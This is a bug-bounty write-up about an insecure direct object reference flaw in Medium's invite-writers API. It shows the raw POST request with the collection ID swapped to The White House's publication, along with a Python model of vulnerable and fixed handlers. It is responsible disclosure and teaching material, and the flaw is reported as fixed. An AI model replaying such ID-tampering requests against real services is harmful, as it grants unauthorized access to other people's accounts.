
How I invited myself as a Writer of The White House’s Medium Publication

by Allan Jay Dumanhug (@ajdumanhug), November 16th, 2016


Image from http://www.wellesley.edu

While I was riding home with an Uber, I received an email from Medium about its 5 new features. One of those is the Invite Writers feature.

Email from Medium

New features mean there is a good chance of new security issues. So I started testing the feature by inviting my second email address to my own publication, to see how it works. While going through the invite process, I opened an intercepting proxy and captured the HTTP POST request, and this is what I got:

POST /_/api/collections/62fcbc0a9209/invited-authors HTTP/1.1
Host: medium.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Obvious-CID: web
X-XSRF-Token: NDZnMsyhRddws0sV
X-Client-Date: 1479216955226
Content-Type: application/json
Referer: https://medium.com/secuna/edit
Content-Length: 41
Cookie: {Redacted}
Connection: close

{"email":"[email protected]"}

Look at the request line at the top and find the value after /collections/.

62fcbc0a9209 is the Collection ID of Secuna, and it quickly reminded me that this kind of request is possibly vulnerable to Insecure Direct Object Reference, also known as IDOR: the server may be trusting the ID in the URL without checking that the logged-in user is actually allowed to manage that collection. So, without hesitation, I searched for The White House’s Medium Publication and grabbed its Collection ID.

The White House’s Collection ID: 51210352003f

After grabbing The White House’s Collection ID, I modified the HTTP POST request and changed the Collection ID in the path from my publication’s to The White House’s. Everything else, including my own session cookie and XSRF token, stayed the same.

POST /_/api/collections/51210352003f/invited-authors HTTP/1.1
Host: medium.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Obvious-CID: web
X-XSRF-Token: NDZnMsyhRddws0sV
X-Client-Date: 1479216955226
Content-Type: application/json
Referer: https://medium.com/secuna/edit
Content-Length: 41
Cookie: {Redacted}
Connection: close

{"email":"[email protected]"}

Then I submitted the modified HTTP POST request and got a 200 OK response, which means I had successfully invited myself as a Writer for The White House’s Medium Publication.
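To make the root cause concrete, here is a small model of the invited-authors handler, added as example code (this is not Medium’s code): the vulnerable version trusts the Collection ID from the URL path, the fixed version adds the object-level authorization check that was missing. The editor names and email are constructed; the two Collection IDs are the ones quoted above.

```python
from dataclasses import dataclass, field

# Constructed in-memory model of publications and who may manage them.
# Collection IDs are the two from the post; editor names are made up.
COLLECTIONS = {
    "62fcbc0a9209": {"name": "Secuna", "editors": {"allan"}},
    "51210352003f": {"name": "The White House", "editors": {"wh_admin"}},
}


@dataclass
class Store:
    """Stands in for the invites table; holds (collection_id, email)."""
    invites: list = field(default_factory=list)


def invite_author_vulnerable(store, session_user, collection_id, email):
    """IDOR pattern: the caller is authenticated (session_user) but never
    authorized against *this* collection, so any logged-in user can invite
    writers to any publication whose ID they know. IDs are public (they are
    visible on every publication page), so secrecy of the ID is no defence."""
    if collection_id not in COLLECTIONS:
        return 404
    store.invites.append((collection_id, email))
    return 200


def invite_author_fixed(store, session_user, collection_id, email):
    """Object-level authorization: the session user must be an editor of the
    collection named in the path before the invite row is created. Unknown
    collection -> 404, caller not an editor -> 403, as a web API would answer."""
    collection = COLLECTIONS.get(collection_id)
    if collection is None:
        return 404
    if session_user not in collection["editors"]:
        return 403
    store.invites.append((collection_id, email))
    return 200


def replay_requests():
    """Replay the post's two requests (own publication, then The White House)
    as the same logged-in user against both handlers."""
    results = {}
    for name, handler in (("vulnerable", invite_author_vulnerable),
                          ("fixed", invite_author_fixed)):
        store = Store()
        own = handler(store, "allan", "62fcbc0a9209", "second@example.invalid")
        other = handler(store, "allan", "51210352003f", "second@example.invalid")
        results[name] = (own, other, len(store.invites))
    return results
```

With the fix, the second request is refused with 403 and no invite row is written; the first request still succeeds, so legitimate editors are unaffected.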

After 3 seconds, I got an email from Medium with an invitation link.

Invitation Link from The White House

And Wee!

After I found this severe security issue, I immediately reported it to Medium’s Security Team. In just 9 hours, they fixed it and rewarded me with a $250 bounty.

I’m happy yet a little sad at the same time, because they removed me from The White House’s Medium Publication (haha).

Seriously, I am so happy because I helped Medium once again in making their platform more secure by finding and reporting security vulnerabilities. I’m also the one who found a bug that allowed anyone to update and delete any story on Medium.